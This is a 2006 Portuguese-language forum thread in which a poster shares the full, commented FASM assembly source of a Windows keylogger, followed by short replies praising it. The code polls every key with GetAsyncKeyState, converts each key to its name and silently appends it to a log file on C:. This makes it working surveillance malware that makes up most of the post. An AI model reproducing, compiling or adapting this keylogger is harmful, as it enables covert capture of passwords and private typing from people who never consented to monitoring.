[Source] Simples KeyLogger em ASM

Iniciado por Dark_Side, 06 de Outubro , 2006, 03:09:25 AM

tópico anterior - próximo tópico

0 Membros e 1 Visitante estão vendo este tópico.

Imprimir
Ir para o fim Páginas1
Ações

Dark_Side

06 de Outubro , 2006, 03:09:25 AM
Hi,
Segue um simples programa que demonstra uma maneira básica de ser criar um keylogger em Assembly.
O código foi compilado no Fasm.

Código Selecionar
format PE GUI 5.0
entry start  ; Ponto de partida

include 'win32a.inc' ; funções e constantes -> API do Windows

log db "C:\log.txt",0  ; Arquivo de log
buffer db 0x100 dup (?) ; Buffer -> nome da tecla
bytes_escritos dd 0 ; variável -> armazena número de bytes escritos no arquivo


start:
mov esi,7  ; esi = 7; Ignorar caracteres especiais -> logar de BackSpace em diante
invoke Sleep,1; Pausa -> evitar 100% de uso
jmp gogo ; Lolz, começa logar...

gogo:
cmp esi,255 ; Verifica se ESI = 255 -> última tecla
je start ; Se for, pula para o início onde o registrador receberá o valor inicial 7

inc esi ; Caso ainda não seja 255, incrementa o valor
invoke GetAsyncKeyState,esi ; Verifica se a tecla correspondente ao valor de ESI foi pressionada
cmp eax,0 ; Compara o valor de retorno (eax) com 0
jnz logar ; Se não for 0 = tecla pressionada -> logar tecla
jmp gogo  ; Retorna ao loop caso a tecla não seja pressionada

logar:
invoke MapVirtualKey,esi,0 ; Obtém parâmetros da tecla
shl eax,16  ; Desloca 16 bits para a esquerda (shift left) -> parâmetro nome da tecla
invoke GetKeyNameText,eax,buffer,0x100 ; Obtém o nome da tecla e armazena em "buffer"

; Tenta criar o arquivo ou abri-lo
invoke  CreateFile, log, GENERIC_WRITE, 0,  NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL
cmp eax,0 ; Verifica erro
je exit ; Encerra em caso de erro

; Como utilizaremos outras funções que alteram o valor do registrador EAX
; que atualmente possui o ponteiro para o arquivo criado acima, utilizamos o registrador EBX como backup
mov ebx,eax ; ebx = eax -> ponteiro para o arquivo

invoke SetFilePointer,ebx,0,0,FILE_END  ; Move posição de leitura/escrita para o final do arquivo

invoke lstrlen,buffer ; Obtém tamanho em bytes do buffer ocupado -> retornado em EAX
invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL ; Escreve no arquivo o nome da tecla
invoke Sleep,100 ; Pausa entre a escrita no arquivo e o retorno à captura de teclas
invoke CloseHandle,ebx ; Fecha ponteiro para o arquivo
jmp gogo  ; Gogo de novo :)

exit:

invoke ExitProcess,0 ; Encerra


; Funções lolz

data import

  library kernel,'KERNEL32.DLL',\
          user,'USER32.DLL'

  import kernel,\
       Sleep,'Sleep',\
       CreateFile,'CreateFileA',\
       WriteFile,'WriteFile',\
       SetFilePointer,'SetFilePointer',\
       CloseHandle,'CloseHandle',\
       lstrlen,'lstrlenA',\
       ExitProcess,'ExitProcess'

  import user,\
         GetAsyncKeyState, 'GetAsyncKeyState',\
         MapVirtualKey,'MapVirtualKeyA',\
         GetKeyNameText,'GetKeyNameTextA'

end data
Bye  :D

rog

#1
06 de Outubro , 2006, 03:39:14 AM
esse e bem curtinho

vlw

rog
realty.sys is corrupt :  reboot the universe (Y/N)

Anonymous

#2
06 de Outubro , 2006, 02:15:19 PM
Muito bom Dark, servirá como ótima fonte de estudo (pelo menos para mim).
Parabéns!

insanity

#3
06 de Outubro , 2006, 02:34:38 PM
ah, minha cabeça ate doeu agora he he he
Parabens aí dark_site...

ate mais

Anonymous

#4
10 de Dezembro , 2006, 08:47:08 PM
Putz tiveram a mesma ideia q eu! :P Eu to fazendo um em asm, porem é pra linux, mas vlw por compartilhar Dark_Side
Imprimir
Ir para o topo Páginas1
Ações